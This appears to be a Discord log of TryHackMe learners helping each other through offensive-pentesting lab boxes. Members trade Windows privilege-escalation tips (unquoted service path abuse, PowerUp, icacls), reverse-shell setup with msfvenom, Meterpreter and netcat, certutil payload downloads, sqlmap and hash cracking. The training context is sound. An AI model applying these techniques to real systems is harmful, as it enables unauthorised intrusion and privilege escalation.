#offensive-pentesting-path

Trying things in ways not expected

Cool man, really appreciate those tips

Sure. Hope it helps with another perspective.

It does. I am going to try some injection with the API calls from the command line this weekend and I will let you know if I get that working.

If it works in Meterpreter, there is no reason it shouldn't be able to work outside of it. Just need to spend time understanding how it works better...thanks again to @real sandal for those ideas

can anyone suggest me best and chip wifi adapator for hacking

I’d say that’s a little more #site-support or #general

@mental summit

Also, simply Google that one. There are a limited selection of adapters that generally work. Needs promiscuous mode and a chipset recognized by the system. Lots of guides.

https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
@rancid vine thanks for this

Anyone solve a brainStorm(BOF)? I downloaded the binary file but it coudnl't run on windows 32bit.

@toxic night Is that using FTP? Check FTP mode to trasfer files text/binary.

of course, I downloaded on binary mode

oh I got it... I confuse a download file. Thank you

Guys
anybody took the OSCP after finishing the OSCP path?

was the machines in the PWK labs similar to those in tryhackme OSCP path?

Hi Guys! am I the only one that in Steel Mountains is not able to run PowerUp.ps1 in powershell?

I tried running from shell, from powershell, I tried a different versoin of powerup... still no output!

Are you getting errors when you run it?

nothing at all

You're probably not going to have success trying to call Powershell from a reverse shell. Did it work in Meterpreter?

Did you run Invoke-AllChecks?

That's not how you use powershell

from the meterpreter i go either in powershell_shell or as in the picture I'm in the normal "shell" dos

@rancid vine I agree, this is not powershell, I'm in the normal shell here... because in powershell does not work either

Go back to PowerShell...and run Invoke-AllChecks

That is how you run PowerUp.ps1

i feel so stupid now! thanks @terse perch it works!

Oh don't feel stupid, we are all learning

I was expecting it to output straight away instead of loading the functions only!

I was too at first lol

Let me know if that works for you

Powershell is a scripting language. Works similar to other scripting languages. 🙂

it is working thanks guys

I did find that I needed to get the PowerUp.ps1 version from PowerShellMafia

in github right?

Yes

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

Yep

The other version doesn't give you "CanRestart" which is needed for the privesc

i got that one, and CanRestart is true

There are windows commands you can run to get similar info.

@rancid vine sure, pure powershell i'd go: get-service | select-object *

sc qc "AdvancedSystemCareService9"

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """

Running that will tell you if there are any USP's on the machine as well.

Nice!

And if you cd into the Directory that returns, you can run icacls against the directory name.

This will tell you what your permissions are with the service and directory.

If you look at Bill at the top, you can see RX,W. That is read, write, execute authority.

Really the payoff here is if you get a machine that has a crap shell, or Powershell isn't working nicely, you have some manual options.

cool!!

I just started using icacls...super useful

Thank you for sharing that

interestingly the sc qc command is not working in the vm

Make sure you are in a parent directory

So in this case I had to be in the IObit directory

But you can do it from the C:\ directory as well. Anywhere in the program path should work if I'm not mistaken.

who found the "name of the abnormal service running" in "HackPark"?

i was able to get the flags and everything, but I can't find what answer they want for question #3 in Task 4

I did

can you give me a hint on what to look for?

is it an .exe?

Every process is an exe

got it.. i tried entering every single running process, from the obvious to the impossible one. still cannot find that one

but still can't find it

btw, the machine keeps terminating even when clicking on "add 1 hour". it's the 2nd machine that this happens...

@marble tiger Does this happen after 1 hour? Maybe you need to refresh the page first. Or refresh the page after to confirm

@scenic glen it happens after 1h even if I extend the time. I already reported in #site-bugs and seems it’s a problem that has already been reported especially for HackPark

@marble tiger Cybermentor just released a YouTube video on HackPark if you are looking for some pointers https://www.youtube.com/watch?v=LN5ORLHaqXI

Thanks @terse perch I was able to complete the room, but I’ll check the video as well! I like to see other people’s approach

Stuck on Steel Mountain Task2 Q2

I see port 80 and 8080 open

but the server versions I see dont match the answer format

It is looking for the Name of the file server, starting with the name of the Company that creates the product.

It is four words...starting with the company name...if that helps

Let me know if you want any help beyond that

it kinda helps

I assumed it would be Microsoft something

that fits the first word

No...different company name

Hm

I see a lot of Microsoft stuff and HttpFileServer

If you Google HttpFileServer 2.3 exploits...you should see information with the company name...especially in exploitdb

ahhhh okay, didnt know if that would be required for this step lol

just assumed it was all in the nmap

It should be the first result in your Google search

Got it

Awesome

thanks!

meterpreter > upload /thm/steelmountain/Advanced.exe C:/Users/bill/Desktop
[-] Error running command upload: Errno::ENOENT No such file or directory @ rb_file_s_stat - /thm/steelmountain/Advanced.exe
meterpreter > 

Why does this keep failing

I assume it has something to do with my directory format

The file exists, I just made it

I'm not sure on that one. I went a different route on the exploit.

i got it

Nice...was it the directory format?

yeah i didnt need it, just the file name

now trying to finish step #3

it says upload it and replace the legitimate one

where's the legitimate one lol

C:\Program Files (x86)\IObit\AdvancedSystemCare\

keeps saying the directroy is invalid

meterpreter > cp ASCService.exe C:/Program Files (x86)/IObit/AdvancedSystemCare
meterpreter > cd C:/Program Files (x86)/IObit/AdvancedSystemCare
[-] stdapi_fs_chdir: Operation failed: The directory name is invalid.
meterpreter > cp ASCService.exe C:/Program Files (x86)/IObit/Advanced\SystemCare
meterpreter > cd C:/Program Files (x86)/IObit/Advanced\SystemCare
[-] stdapi_fs_chdir: Operation failed: The directory name is invalid.

You might need to use quotes around the directory since there is a space between Program and Files

ah right

access denied lol

I would switch to a shell on the server, and make sure you are copying the file from bill's desktop to that directory

gatcha

the 'bill' user should have permissions to do that

omggggg

C:\Users\bill\Desktop>copy C:\Users\Bill\Desktop\Advanced│
.exe C:\Program Files (x86)\IObit\Advanced SystemCare    │
copy C:\Users\Bill\Desktop\Advanced.exe C:\Program Files │
(x86)\IObit\Advanced SystemCare                          │
The syntax of the command is incorrect.                  │
                                                     

quotes maybe?

why is windows so bad

'cp' as well

maybe 'copy' works...I've only used 'cp'

not recognized

One sec...let me look at my notes on that

That is what I did, and that worked...

I think it has to be the relative path

oh as Powershell

Ohhh yeah...lol

I guess that is another difference

It should still work thought

though

with cmd.exe

I used Nishang to get a reverse shell through the web server exploit

Didn't use Metasploit

The box went down

lol...ugh, that's the worst

If you are curious on taking that different approach....Ippsec has a video on Optimum from HTB...and it is the exact same HTTP File Server exploit...and pretty cool

Ah yeah Ive seen it before

would need to watch again

Exploits the same null-byte exception vulnerability using Burp

i am still struggling with this stupid copy

Did you stop the service first?

no

That might be part of it

do I need to kill it?

Yes

do i use ps to find it running?

access denied

You can just do it by name "AdvancedSystemCareService9"

nope

no dice

even as Powershell it wont kill it

Hmm that's weird...that is the path I took and was able to get it to work

There are a couple write-ups out there that might help to take a look at their screen shots, just to make sure everything looks right

PS > Stop-Process -Id 848
ERROR: Stop-Process : Cannot stop process "ASCService (848)" because of the following error: Access is denied
ERROR: At line:1 char:1
ERROR: + Stop-Process -Id 848
ERROR: + ~~~~~~~~~~~~~~~~~~~~
ERROR:     + CategoryInfo          : CloseError: (System.Diagnostics.Process (ASCService):Process) [Stop-Process], ProcessCom
ERROR:    mandException
ERROR:     + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand
ERROR: 

access denied

wtf is going on

Not sure if it matters, but I was in the "AdvancedSystemCare" directory when I stopped the service...I believe

omg i give up

cant even cd to it

Sorry man, that is frustrating

Can we restart.

I'd be happy to help

Nice, I was hoping you might be able to help him

I'm reading through the comments trying to make sense of things really quick.

He was having issues getting the service to stop

I haven't done that from Meterpreter...so not sure what might be causing the issue

I see errors in the way the upload was attempted and the attempt at changing directory.

i got the upload working

its in C:\Users\bill\Desktop

I can't copy it to the Service Directory

and I cant kill the service

as meterpreter or as Powershell

If the directory is C:\Users\bill\Desktop, your upload would have to be "C:\Users\bill\Desktop"

Yeah thats not the issue anymore

Why are you trying to kill it from meterpreter or powershell?

That's not going to work.

Where would you kill it from?

Drop into a shell my man.

okay im in a normal shell

I tried this too

to copy the file from Desktop to the folder

wasnt working

It works fine when done correctly. You're making a mistake somewhere.

Why not do this:

C:\Users\bill\Desktop>copy ASCService.exe "C:\Program Files (x86)\IObit\AdvancedSystemCare\ASCService.exe"
copy ASCService.exe "C:\Program Files (x86)\IObit\AdvancedSystemCare\ASCService.exe"
The system cannot find the path specified.
        0 file(s) copied.

||Start a local python server, and go to the proper directory and run certutil to pull it from your Kali machine to the directory.||

thatll work too

Umm, why are you messing around with the ASCService file?

That is what the unquoted path vuln works with

But you aren't replacing ASCService.exe

You're supposed to inject a maliciously named payload into the path before the system gets to it when the process is started.

im not sure how to do that

Right...by replacing the ASCService.exe with a malicious file

See the above picture.

No, you don't replace ASCService.

Oh, well I did and that worked lol

I dont understand the image lol

I thought the directory ASCService is in was system privileged.

looks it

i get access denied

but theres Advanced SystemCare

The image above describes how a service path is ran when the path is "unquoted."

and AdvancedSystemCare

Let me talk for a minute

So you don't lose track of what I'm saying.

ok sorry

The image above describes how a service path is ran when the path is "unquoted."

In this case, the service path is C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

In this case, being as the path is not specifically defined due to the lack of quotes, the system will attempt to run the following in each directory:

C:\Program.exe
C:\Program Files (x86)\Iobit.exe
C:\Program Files (x86)\IObit\Advanced.exe
C:\Program Files(x86)\IObit\Advanced SystemCare\ASCService.exe

okay copied Advanced.exe to the 3rd option there

in IObit

You shouldn't have access to the Advanced SystemCare directory as it requires elevated privileges. So you can't replace ASCService.exe. But as the path is unquoted, you can replace something like the Advanced SystemCare directory with Advanced.exe.

Ahhhh, that's way easier than the approach I took....over complicated it

Because when the system lands in IObit, it will look for to try to execute what it finds. So we give it an executable named after a directory, in this case Advanced SystemCare.

This is the approach I took, after stopping the service, and was able to get system shell

Task #3 tells you how to stop and restart services. Now, I would ignore personally the powershell command they offer (it doesn't provide much context), and run the following command to determine if there are unquoted service paths first:

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """

Follow this by going to the directory in question that hosts the service returned, and in this case run icacls "Advanced SystemCare"

This will tell you if the service and directory is modifiable by the users on the machine.

I'm intrigued that you were able to modify that directory. I didn't think that was possible.

I'm in the middle of HackPark..once I finish I will go back and try again....can't remember right now as it has been 5 days

Typically unquoted service path challenges won't allow you access to the directory the executable is located in.

I also came in through the HTTP File Server by dropping Nishang and getting a reverse shell in that manner...not sure if that makes a difference...still was 'bill'

Yea, that's a way different way than I took.

Ippsec showed this approach in Optimum...same Http File Server version

im confused

the task doesnt show those instructions

did i copy the exe to the right place?

I dropped into the correct location when I did it and just grabbed the file from my python server.

¯_(ツ)_/¯

im confused

Don't pay attention to my comments...I came at it from a different approach than the instructions.

I try to complete each box w/o Metasploit since you technically can't use it on the OSCP and I am taking it in July

Listen to @rancid vine , he took the approach that the instructions are getting at

All of the guides I've written are done without metasploit

I think Steel Mountain I followed the room and so I included it. But honestly I think the metasploit version overcomplicates things a lot.

i've just started to see your stuff in the last week...definitely going to be checking it out

Oh cool

Up till now I have mostly seen Ippsec, TCM, and John Hammond

Obviously, there are a lot of sources, but I try to stick with the same consistent people, definitely adding you to that list

And I just tested what you said about the way you do it. I'm surprised that even worked. Usually the directory isn't able to be modified.

Were you able to get it to work?

Yea. I'm just shocked that directory can be modified. Not really a unquoted service path vulnerability at that point.

I know, right? lol But, I am glad you explained the path you took. I better understand the true essence of unquoted service path and will not make that mistake again...it worked, but shouldn't have the way I did it

yeah im lost

Yea. The way I just did it, and the way you did it isn't actually USP.

Tyr4el, what are you lost on specifically?

managed to stop the sevice

service

Good. Half the battle.

copied my malicious file

cannot restart

What command did you try to run?

Use /spoiler

||C:\Users\bill\Desktop>sc start AdvancedSystemCareService9

[*] Sending stage (176195 bytes) to 10.10.119.80
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.||

That's a proper response.

Do you have a netcat listener running?

mmmm no

i should lol

😂

It's always the little things lol

ugh

ive lost track of which ports are what

i gotta start over

box died anyway

oh well

gotta go

Check this out if you need help. https://www.cybersecpadawan.com/2020/04/tryhackme-steel-mountain-metasploit-and.html

Is that your site @rancid vine

Yep

Nice! I'll be checking it out. Appreciate you brother

Oh that's a really good walk-through with explanations

I'll use that one

When I get a chance to restart the box

I've tried every possible combination I can think of....what is HackPark Task 4 Question #2 looking for?

im STILL

stuck

at resarting the service

its not calling my job

multi/handler

@rancid vine

https://imgur.com/wD6nJ6T.png

oh i had it

but it died

when i do exploit -j am i supposed to wait until it finishes?

It just says started reverse tcp handler on xxxxxxxx

but then never does anything

just stays on a blank line

Do you have the listener running on 5555?

aye

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9

[*] Sending stage (176195 bytes) to 10.10.158.97
sc start AdvancedSystemCareService9
[*] Meterpreter session 3 opened (10.8.17.120:5555 -> 10.10.158.97:54816) at 2020-05-10 17:31:47 -0400
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.


C:\Program Files (x86)\IObit>[*] 10.10.158.97 - Meterpreter session 3 closed.  Reason: Died

thats what happens

Hmmm not sure what is happening there.... @rancid vine will need to take a look

it opens but the meterpreter shell never opens

all I get is a blank cursor

idk if i need to open another msfconsole instance and interact with the new session or what

you should be able to switch between sessions in the same msfconsole instance

When you get the cursor, you cannot interact with it?

i tried ps the first time

nothing happened

then it died

lol

maybe just try whoami

ight

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9

[*] Sending stage (176195 bytes) to 10.10.158.97
sc start AdvancedSystemCareService9
[*] Meterpreter session 4 opened (10.8.17.120:5555 -> 10.10.158.97:54824) at 2020-05-10 17:36:18 -0400

whoami
ps
migrate 1660
sysinfo

lul

lol

and it failed

What about trying to run a Netcat listener and connecting to that

id have to rebuild the exe lol

keeps saying the port is in use

It must be connected somewhere

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                         Connection
  --  ----  ----                     -----------                         ----------
  1         meterpreter x86/windows  STEELMOUNTAIN\bill @ STEELMOUNTAIN  10.8.17.120:4444 -> 10.10.158.97:54798 (10.10.158.97)

msf5 exploit(multi/handler) > sessions -i 4
[-] Invalid session identifier: 4

even though the multi/handler keeps incrementing they're just like...dead somewhere

you have 1 session open

yes

but my multi/handler keeps incrementing

you're trying to open session 4

Yes I know

bc the last multi/handler I opened was 5

so I figure the others are alive somewehre

had to try

but

there's one session active

yes indeed

lol

if there were other sessions they'd show there 🙂

unless I'm missing something?

He is trying to get a reverse shell on 5555, but it keeps quiting on him

yeh

He's trying to make sure it is not still alive somewhere before trying to start up a NC listener

^

aaah I gotcha!

im determined to get the multi/handler to work

sudo lsof -i:5555

should tell you if there's a process with that port running on your vm

ugh it just keeps dying

WHY

Payload?

Try something different.

namelessone@namelessone:~/thm/steelmountain$ sudo lsof -i:5555
COMMAND  PID        USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
ruby    6211 namelessone    7u  IPv4 141547      0t0  TCP 192.168.196.128:5555 (LISTEN)

idk how it got that IP

thats not what I set

kill 6211 didnt kill it lol

that IP address will be your kali vm

so you didn't set the msfvenom (I assume) to the right ip / interface

I definitely did

O.o

but when I did exploit -j it started with that IP

no idea why

and now it wont die

sudo kill -9 6211

lets do this again

i completely killed msf

kill just sends a sigterm which is the first one to do, if it doesn't respond then a -9 or sigkill will work

it isn't the best but

haha yeah somthing funky seems to be on going by the sounds :^^

i give up

this is stupid

its just dying constantly

how do i get the payload to connect back to me?

i gotta redo the whole damn thing

using netcat

same way just dont use multi/handler?

okay lets do this

hope it works

yes, you create your msfvenom payload with a windows tcp payload...and then just run Netcat listener

You can use msfvenom and catch it on netcat for sure

@terse perch beat me to to it 😛

lol

@terse herald Have you completed Hackpark yet?

okay well

netcat caught it

but no commands are working

and it died

i give up

Something weird is happening

yes

I've done everything but Task 5 of it

I don't remember having an issue with getting a meterpreter shell though

I think there's a known bug I remember seeing recently

What for the love of all that is holy does Task 4 Question 2 want?

I've tried every combination I can think of for the OS and I can't get anything to work

Oh it's not that exact bug that I'm thinking of, but it's quite unstable at the best of times I think

I've been able to root the box and get all the flags, just trying to figure out 2 remaining questions it is looking for

uh two ticks I'll have a look at it

That is the question

Following the answer format....I am not getting it

Oh right

well there's a useful command in meterpreter that'll tell you 🙂

That's how I got it when I done it

haha Ugh, I guess I need to fire up Meterpreter then lol

I love these rooms...just wish you didn't have to use Metasploit to get some of the answers

You don't have to use meterpreter to get it but it's the nicest way

I'm pretty sure that box has wmic 🙂

There's quite a few command line commands you can use to find out the answer tbh

I have systeminfo and have run winpeas...I know what the OS version is...I just don't know how they want the question

Mhm, wanna screenshot me what you have over dm?

Yes, one sec

i honestly dont know how but the LHOST keeps getting set to my actual Local IP somehow

even though i never type it in

now setting LHOST is broken

Idk whats going on

screw it, moving on

can you not set to interface tun0 rather then specifying an ip address in that case?

That's real odd O.o

yeah it really is

That is probably it right there...I saw someone else with a right up that said it kept dying until they put tun0

i could try reinitializing the db

write-up

try tun0 first!

then that'd be my next go-to

I did lol

it never set it

oh

metasploit be wildin'

then when I ran exploit, it didnt even run

just quit immediately

even wtih all options set

ive been on that one for a few hours

im over it

just note to self that i need to work on learning this stuff

what types of files does IIS serve?

ASPX?

sounds like a really good google question

it does...and i did look

lol

oh oky found em

why is dirbuster not picking up anything on Alfred then

Oh nvm

I had to cheat a little with Alfred

Never worked with Jeeves before

You mean Jenkins lol

Yeah [insert Butler name here]

That's what I said

lol

Finished Task 1 and had to go

Womp

So I'll have to rebuild a new project next time but at least I know where to go

That's what I had to cheat with. Had never seen Jenkins interface before and the steps were like "okay go ahead and execute your powershell code!" And I'm like "cool, where"

lol I was the same....I finally figured out where after like an hour

I cheated cuz I was short on time. My daughter was about to wake up from her nap

Need help with Brainstorm... I have managed to get a shell on a WinXP and a Windows 7 VM... however for some reason when I try the exploit against Brainstorm... it doesn't work

Does anybody know why this could be happening?

I just figured it out never mind ...

can I bug someone about hackpark?

im getting a connection back on my listener but no shell

Referring to the File Manager upload?

oh no for the non metasploit part

but i just figured it out

was using staged payload lol

Yep. 🙂

Game of Typos

Hey all, looking for a nudge on Lord of The Root. I've ||found the log-in page but can't get past it. I've tried to hydra it but don't know the username. I've tried admin and 'legolas. Have I missed something or do I just need to go at with a username list as well? ||

^ Ah, nevermind. ||I tried to test manually for injection -- being OSCP prep and all. Just tried SQLMap as a double-check and it does work. ||

ew sqlmap

evil

Hahaha, right? I've got my head around manual injection with UNION SELECTS and stuff not not the blind/sleep stuff. Need to look into all that more

I typically use jSQL, much better interface

Finally finished the the path 100%! Thanks to TryHackMe and all the room authors 🙂 Whilst I wait for the 'Extra Credit' section to grow, are there any other rooms that people would recommend? All I've done on the site so far is this path.

Thats awesome!

Nice one:)

There are lots of rooms that will help you

That path needs updating

Try some of the more recent challenges

I was going to just sort by popularity and join ones I haven't done yet but thought I'd ask here first 🙂

Amazing, out of interest, how did you hear of THM?

Attacktive Directory is really good.

It can be done 100% without Metasploit as well.

A colleague from my work recommended it to me on our "lockdown chat" hahaah (Plus I'm trying to angle for them to pay for my OSCP so doing this shows I'm "serious" 🙄 !)

Ah fair enough, thats cool

In their eyes I mean, I'm actually really enjoying the site. More than HTB in a way because you can sort of seek out things you want to brush up instead of crossing your fingers it shows up on a box with a cryptic name 🙂

Yeah, we have a different approach to learning to them.

But really pleased you liked the course.

I prefer it, thanks a lot for starting all this

Keep up the greating hacking, and as The Mayor said, Attacktive Directory is a good next room. As in OSCP, try do as much of it as possible without metasploit.

I see people praising my creation

Its a great room ngl. I might put it under our featured rooms for Intermediate/Advanced experienced levels actually?

Go for it

hi guys. Has anybody experience with the chellange at the end of room "Buffer Overflows" -> overflow-3 ??
Im stucked on that 3 days :). I created payload, shell come, but not under user2, but under user1.
its a task 8

@frosty talon Did you notice, that the binary has got a suid bit set?

no i forgot. Tou are right, suid is set

can someone answer a quick john question for me?>

im not getting a password but i know the version and flags used are correct

A bit more information would be helpful. 🙂

oh wasnt sure if we have to dm questions to avoid spolers

basically john runs

but im not getting a password from the hash

Which room?

Can you take a screenshot and mark it "spoiler"?

gamezone

sure

john --show hash.txt says theres one hash left to crack

@wide jungle If that's a unix account password (I can't remember the task well enough to say)

It won't be Raw-SHA256

so the examples are just examples?

i even excluded it

Remind me the task again?

crack a hash i got from sqlmap

then i have to provide the de-hashed pw

It says there are 22 hashes?

Trust me to not bother taking notes for that one...

Shouldn't there just be one hash from the sqlmap output?

there is

its just one

But John thinks there are 22....

Hm, try removing the space between the = sign and the wordlist path?

still not working with edits

this wouldnt be the first time they tell us depracated commands

im using kali 2020 fyi

That won't matter

Something seems off with the way the hash is in the 'hash.txt' file

Basically, your command is correct....something is just off between getting the hash from the user db and John reading it

no invisible spaces

im using mousepad text editor

try vim

ctrl+shift+v then :wq ftw

Not sure if that is much help, but looks like that is what is happening to me. @rancid vine might have some other ideas

Try doing echo -n "<hash>" > hash.txt

Then doing that

Just tried it and it works for me

Whats the issue?

Just use nano, echo takes out a lot of the original hash for some reason

What on earth are you on about?

Oh, sounds like you're not escaping stuff

@wide jungle

Can confirm, that will work

If it doesn't, your JtR has a problem

(Also make sure that you've unzipped rockyou -- common mistake there)

Yea I don't remember this one having any issues.

And I have a hate/hate relationship with hash cracking.

John is ugh

My rockyou regularly throws UTC-8 errors though. so I eventually went with something else.

What do you prefer....hashcat?

Mhm

I don't prefer any of them.

¯_(ツ)_/¯

lol

i have rockyou unzipped

Custom hash cracking program anyone?

i think jtr is broken in kali

If it isn't tomcat:s3cret or admin:admin I'm moving on.

yeah i dont like hash cracking

the juice is never worth the squeeze

I'll spin up a box quick and see what I did

Custom hash cracking program anyone?
@chrome valve only if it's 500% less efficient than others

@wide jungle Try using the command I gave you? echo -n "<hash>" > hash.txt

so yeah im still having issues

didnt help

a bit frustrated but these situations are really annoying when learning this stuff

ive had 100s of them

Ok, DM me your exact syntax -- if it's right, I'll give you the password so you can move on with the room

If this kinda thing is happening regularly, you may want a new VM btw

it seems liek a common thing in pentesting courses

i just got a new one

You may want to go back to 2019.3

it ends up being old commands depracated flags or they dont say they are on a specific version

Also, remember that hacking, by nature, is never going to be a streamlined process

It's all research and learning

thats fair just wish if i pay for something the other side notes caveats

im sure there are too many thoughj

And yeah, unfortunately things change too quickly for us as content creators to go back updating every five minutes

Annoying side effect of a fast moving industry

I just cracked it in less than 3 seconds using the recommended syntax in the room.

thanks @chrome valve

looks like john is cracking and caching the password

but wont stdout

Np 🙂

(Also make sure that you've unzipped rockyou -- common mistake there)
*gunzipped

Unzipped being the generic term, Kris...

I know I was saying that sarcastically and tiredly

Sorry

Who solved Lord of the Root? I need a help..

I found hidden service and that's it. i played a gobuster but there's nothing special.

Someone else having powershell issues on Alfred ?

Anyone working on Brainstorm box?

Please be more descriptive Batman. Frosty, are you having issues? If so, what are they?

I am having an issue with Task 4, generating shellcode with msfvenom. I create the shellcode as stated by sawinskii's walkthough and when executing the .py script chatserver.exe shuts down on the windows 7 VM I'm running. I have tested creating msfvenom shellcode to have the calc pop and that works fine. However cannot get the reverse shell to work.

Nevermind, I got it using meterpreter instead of nc

Depends which shellcode you use. You can do it fine using netcat, you just need to use the appropriate shell for it.

how long are we supposed to wait after deploying a machine?

i find i waste the first hour on tryhack waiting for the machine to actually respond and load even port 80

Hi there. This isn't really meant for this channel. You could ask this in the #room-help

im not waiting an hour but it will work

then break

then work again

ah

kk

It shouldn't take an hour

It should take no more than 5 minutes usually. Quicker if you're a subscriber.

Which machine are you trying?

What's this channel for?

The Offensive Pentesting path.

magic

I presumed that much, where can I read on this?

The learning path on the website would be a good place to start.

Any recommendations of Rooms (machines) for OSCP final prep? Done the Pen Test Path already.

@small dune give me a minute and I’ll pull the rooms i used for prep

Thanks!!

would appreciate some further recommendations too, @final vault 🙂

@rancid vine Thank you for the response. I'll keep that in mind and try again with a different shell.

@small dune give me a minute and I’ll pull the rooms i used for prep
@final vault have you shared this already?

@smoky thorn Nope I'm waiting patiently 🙂

hahaha, i'm sorry, :c

Note these aren't all TryHackMe based, I used HTB equally to prepare but for this I'll split them up so it's obvious which ones are there;
THM

- Obviously most of the Path on the platform
- Ignite
- CMesS (Has some value)
- ConvertMyVideo (New room I didn't use but could apply)
- Brainpan (Buffer overflow goes brrr - ez 25 points)``` 
**__HTB__** 
*(Added as might help)*

• Jeeves
• cronos
• bashed
• Shocker
  (May be more but I can't quite remember)```
  Misc

- Vuln Server (TRUN Function) 
  - Great for enforcing buffer overflows (Easy 25 points)

thanks dude

i'll steal this

I'll make an actual list that I feel has similarities on my blog soon™️ and will keep it up to date

yeah I’m stealing this too

Obviously don't want to add too much HTB stuff due to the server we're in

yeah, feel free to drop a link in dms or wherever

Also once my new room/s come out I'll focus on pushing some newer prep boxes

Look forward to them! It’ll be nice to have something to spend a bit of summer on (hopefully!)

@final vault Thanks !!!!

The learning path on the website would be a good place to start.
Thanks. since the other paths didn't have a channel I thought it was something else

Anyone Completed Corp by DLL exploit?

I have not. You should try though and let us know if it works. I'm guessing it won't due to the applocker restrictions.

Hey friends, are there any rooms on THM to practice tunnelling?

@cloud flicker SSH tunneling?

any of it really, I'm reading the module on PWK and it's tricky to get my head around it

@cloud flicker GameZone has SSH tunneling

^ I was about to type that

I've got it in an upcoming challenge

👀

But I think those might be the only ones

Thanks both

@rancid vine Yeah I get only fela shell, maybe I did it wrong or something and I cant login with the password I found from UnattendPath It shows password expired

You really need to understand how App Locker works in order to understand why you won't be able to go a different path.

That one directory has been whitelisted. So even if winPEAS says there is a possible hijack point elsewhere, if that directory isn't whitelisted for modification you won't have permission to do so.

Gotcha

what about the password expired?

@cloud flicker check out sshuttle
you just need a valid set of creds.
You wont be able to nmap through the tunnel though. You'd have to drop an nmap portable binary on the dual hommed host unfortunately.

Play with it Nikhil and see what you can do.

¯_(ツ)_/¯

@crimson flame many thanks!!

Good day everyone... I just completed the "Tempus Fugit Durius" room... Can you recommend other rooms just like that one?

Borderlands is a good one

can I get help in brainpan1?

Sure

What's your question?

I am in the very last step but i cant use the ||GTFO ||cuz it doesnt prompt me , just quits

I don't remember needing GTFObins for that.

So I recommend playing with the different commands options that are available.

||and understand how to do a shell escape||

ok. Thanks

can anyone suggest a smaller list to crack the hash found in Daily Bugle? Hashcat is taking a lot of time

@analog gull Are you running hashcat on your vm?

yes

Run it on your host machine

alright thanks! @noble glacier

Does the ||sqlmap|| for daily bugle usually take >10minutes?

Does the ||sqlmap|| for daily bugle usually take >10minutes?
@devout idol
Don't think so
Though I didn't do it with ||sqlmap|| as it says do it using a ||"Python"|| script
The ||"Python"|| script took just a min

Yeah i think there's something in place to stop ||sqlmap|| scripts, mine just ran for half an hour and didn't enumerate the databases

I’ve just recently completed that room, search for the python script and use that instead of sqlmap.

Yep. It’ll go much quicker.

What wordlist would you advise for cracking the password hash on Daily Bugle? Write-ups say takes around 20 minutes while mine's taken 30, currently using the rockyou one that comes w/ Kali

From memory it is rockyou @devout idol

If you haven't already, check my writeup on it. From memory I included a command to shorten it.

Legend! Thanks Muriland :)

Anyone to talk about brainpan?

I have completed the bof
But got some questions 😅

What’s up?

Get it figured out Caped Crusader?

Hi gang, I've been trying to elevate privileges in the Steel Mountain room by copying over the ASCService.exe. I keep getting the following error message after running my procedures over and over again on different instances of the box as well:

"The service did not respond to the start or control request in a timely fashion."

Any tips or ideas?

sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

That's an expected answer.

If you aren't getting the response you want, you need to go back over your payload and where you've put it.

As well as confirming that your listener is active and has the correct port.

Right, ok thanks for the help I'll keep checking it

You're definitely on the right track though.

Ugh that was frustrating for me too lol

Hi, could anyone give me a hint what can I do to obtain a root flag on Corp box? Yesterday I had problems with RDP on that box, today I figured out that the admin's password has already expired. (I follow unattended.xml escalation path). I could not find any sort of solution and I'm feeling a bit hopeless. I know that I could try to UAC bypass, but not sure if that way would allow me to type the root flag.

@fleet wedge Try renewing the admin's password.

Okay, I'll try, thank you!

@noble glacier It does not work as well 🤔

It works

Are you accessing the box using rdesktop/xfreerdp? Or via browser tab?

I'm not doing the box currently.

I've completed it for quite some time.

I see. Because as far as I know the password renewing is available during next logon, but there's no option I can escape corp/dark or corp/f*** account. I have tried runas /user:Administrator cmd - this would not work obviously due to password expiration. I have tried logging out on browser, but could not get the login prompt to provide creds for Admin or any user at all. I thought that maybe this Guacamole session is malfunctioning, thus I tried using rdesktop/xfreerdp, but my connection is automatically down, because there's some error with CredSSP. It fails to connect using NLA or SSL. (Btw command 'shutdown -l' or 'logoff' executed from CMD does not work as well - I get this Guacamole Remote Tryhackme login prompt, which crashes access completely). Damn, maybe I'm doing something terribly wrong and I have been thinking that there's something wrong with the box/guacamole, but in fact it is not. Anyway, something tells me that this challenge should not (probably) be as difficult as it seems right now (due to this login problems/being unable to connect to the box with rdesktop, which worked perfectly for me when doing such boxes). Idk..

I'm confused as to why all the extra stuff. Even the guide says you should Kerberoast, crack the user hash, and then use power up to privesc.

The flag is sitting in the Unattended.xml file. PowerUp should have found it, and all you have to do is use more to show the contents.

I have done this part already. I grabbed the content of unattended.xml and decrypted it on Kali. The only part is to log in as admin, but its password, which I obtained, expired heh.

Your supposed to renew the password.

@fleet wedge Are you using the THM online kali?

No, my personal

Ask your question in #room-help

I'm almost completely certain you don't have to renew any passwords.

Like 100% sure. You just log in with xfreerdp

Yes, but the password is expired and you have to set a new one

Like the box is broken?

Cannot establish connection with xfreerdp with the box

Hm maybe

Because I did this a couple weeks ago with no issue. Going through my notes right now and never made a note of any of that.

Are we talking CORP or IRON CORP?

Corp

Corp

(And my openvpn connection is valid)

Can I have the IP to your room?

That way I don't need to spin up a box myself.

Now it's:

34.245.164.139

i don't think that looks right

Not at all

But, I just started one and it looks the same.

Interesting 🤔

nah, i keep getting 10.10

That's the IP displayed in this room

Idk

Strange

There was some issue with RDP yesterday I think, maybe that's still a problem

Alright, I'm logged in as admin on your machine

I had to change the password. If you want it I'll give it to you.

The password policy on the machine needs to be fixed.

It isn't supposed to ask for a new one

Okay, hm I get it now
So if you give me that password that will not be a cheat? xd
I can grab it from unattended.xml, it's not a problem haha

I just reset it to what it's supposed to be

Okay, so I'll try now

